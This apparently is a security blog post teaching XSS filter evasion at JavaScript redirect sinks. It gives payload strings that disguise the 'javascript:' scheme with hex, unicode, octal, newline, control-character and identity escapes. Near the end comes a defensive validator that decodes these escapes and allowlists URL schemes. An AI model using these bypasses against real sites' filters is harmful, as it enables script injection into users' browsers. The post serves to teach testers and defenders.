
Xssing Web Part - 1
Hello,

I'm thinking about sharing everything I know about XSS :) However, it's not possible to put all the methods in one single post, so I will be writing several parts of "Xssing Web". Mostly I will be talking about how to bypass XSS filters and how to turn most non-exploitable XSS into exploitable XSS.


All of you have probably encountered an endpoint that takes a URL as a parameter and redirects to it using JavaScript, like:

location.href='URL' 
or
window.location.href='URL' 
or
window.location.replace('URL') 
or
window.location='URL'


In this post I will be talking about how to get XSS in such situations and how to bypass the filters in front of them.

The first thing we can try here is the 'javascript:' protocol or the 'data:' URI scheme.

window.location='javascript:alert(1)'
or
window.location='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg'

Either one would execute the 'alert(1)' function. (Note that current browsers block top-level navigation to data: URLs, so the data: variant no longer works in a plain redirect there.)

From now on I will only be talking about the 'javascript:' protocol, since the same methods can be applied to 'data:' URIs as well.

Let's start,


What if the 'javascript:' string is blocked??

Did you know that the characters of a JavaScript string can also be written as hex escapes??


Format 1 : \x[HEX]   (two hex digits: \xHH)
Format 2 : \u00[HEX] (four hex digits: \uHHHH, so \u00HH for ASCII)

Format 1 : javascript: --> \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a
Format 2 : javascript: --> \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a

Bypasses :

\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)

\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)




What if 'javascript:' and '\x' and '\u' are all blocked??

Did you know we can continue a string onto the next line by ending the line with a backslash character?? ;)

Bypass : java\[0x0a]script:alert(1)




Here [0x0a] is the newline character. You can pass a newline character as input with "%0a" in the URL.

These are a few alternatives to the newline character which you can try if the newline character is also blocked :

[0x09] <---- Horizontal Tab
[0x0d] <---- Carriage Return

(0x0d is a real JS line terminator, so it works as a line continuation just like 0x0a. 0x09 is not: a backslash before a tab simply yields the tab, but the browser's URL parser strips tabs and newlines from the URL before reading the scheme, so the result is still 'javascript:'.)

Ok, now what if 'javascript:' and '\x' and '\u' and [0x0a,0x09,0x0d] are also blocked?

Did you know there are control-character escapes in JS too??

Here are a few control-character escapes that we can use to bypass the filter :

\t  <---- Horizontal Tab
\n <---- Newline
\r <---- Carriage Return

Bypass :  ja\nva\tscript\r:alert(1)




You can use any one or all of these control chars anywhere in the string, because the browser's URL parser removes tab, newline and carriage return before it parses the scheme ;)

Note : Sometimes the filter itself converts 0x0a, 0x09, 0x0d into \n, \t, \r, so you can take advantage of that as well ;)

Now let's assume 'javascript:' and '\x' and '\u' and [0x0a,0x09,0x0d] and [\n,\t,\r] are all blocked??

Ok, do you know about the escape character??

What happens if we put a backslash in front of a character that does not form an escape sequence (\n,\t,\b,\v,\f,\r and of course \x,\u too)??

The answer is NOTHING. The backslash is simply dropped and the character stays as it is.

So we can put the escape char in front of any character except n, t, b, v, f, r, x, u and digits.

Bypass : \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)




One of my friends, @OsandaMalith, found one more bypass. You can read his awesome blog here.

We can encode the string in octal as well :

Format 1 : \[OCTAL]   (one to three octal digits, up to \377)

Format 1 : javascript ---> \152\141\166\141\163\143\162\151\160\164
 
Bypass : \152\141\166\141\163\143\162\151\160\164\072alert(1)
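All of the bypasses above (hex, \u, line continuation, control-character escapes, identity escapes and octal) defeat filters that look at the raw text before the JS engine has interpreted it. Below is an added example of the check a defender wants instead: decode the escapes the way the engine would, drop the whitespace the browser's URL parser ignores, and only then compare the scheme against an allowlist. This is example code, not from the original post; the function names are mine.

```javascript
// Added example (not the post's own code): interpret JS string-literal escapes
// the way the engine would, then allowlist the URL scheme.
const SIMPLE_ESCAPES = { n: "\n", t: "\t", r: "\r", b: "\b", v: "\v", f: "\f" };

// Decode raw text as if it had been pasted inside a JS string literal.
function decodeJsStringLiteral(raw) {
  let out = "";
  for (let i = 0; i < raw.length; i++) {
    if (raw[i] !== "\\") { out += raw[i]; continue; }
    const next = raw[i + 1];
    if (next === undefined) { out += "\\"; break; }        // dangling backslash
    if (next === "\n" || next === "\r" || next === "\u2028" || next === "\u2029") {
      // Line continuation: backslash + line terminator produces nothing.
      i += (next === "\r" && raw[i + 2] === "\n") ? 2 : 1;
      continue;
    }
    const hex2 = raw.substr(i + 2, 2), hex4 = raw.substr(i + 2, 4);
    if (next === "x" && /^[0-9a-f]{2}$/i.test(hex2)) {       // \xHH
      out += String.fromCharCode(parseInt(hex2, 16)); i += 3; continue;
    }
    if (next === "u" && /^[0-9a-f]{4}$/i.test(hex4)) {       // \uHHHH
      out += String.fromCharCode(parseInt(hex4, 16)); i += 5; continue;
    }
    const oct = /^[0-7]{1,3}/.exec(raw.slice(i + 1));        // \OOO legacy octal
    if (oct) {
      let digits = oct[0];
      if (digits.length === 3 && digits[0] > "3") digits = digits.slice(0, 2); // max \377
      out += String.fromCharCode(parseInt(digits, 8)); i += digits.length; continue;
    }
    if (Object.prototype.hasOwnProperty.call(SIMPLE_ESCAPES, next)) {
      out += SIMPLE_ESCAPES[next]; i += 1; continue;        // \n \t \r \b \v \f
    }
    out += next; i += 1;                                     // identity escape: \j is "j"
  }
  return out;
}

// The WHATWG URL parser strips leading C0 controls/space and removes every
// ASCII tab, LF and CR from the input before parsing, so the check does the
// same; otherwise "ja\nva\tscript\r:" would pass a naive prefix test.
function isAllowedRedirect(raw) {
  const url = decodeJsStringLiteral(raw)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\x00-\x20]+/, "");
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(url);
  if (!m) return false;   // schemeless/relative: reject, or resolve against your own origin
  return ["http", "https"].includes(m[1].toLowerCase());
}
```

The safer design is to avoid reflecting user input into a JS string at all and to redirect only to allowlisted targets; this check is the minimum if the sink has to stay.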



That's enough for today ;)
 
References :

http://www.asciitable.com/
https://en.wikipedia.org/wiki/Control_character
https://mathiasbynens.be/notes/javascript-escapes
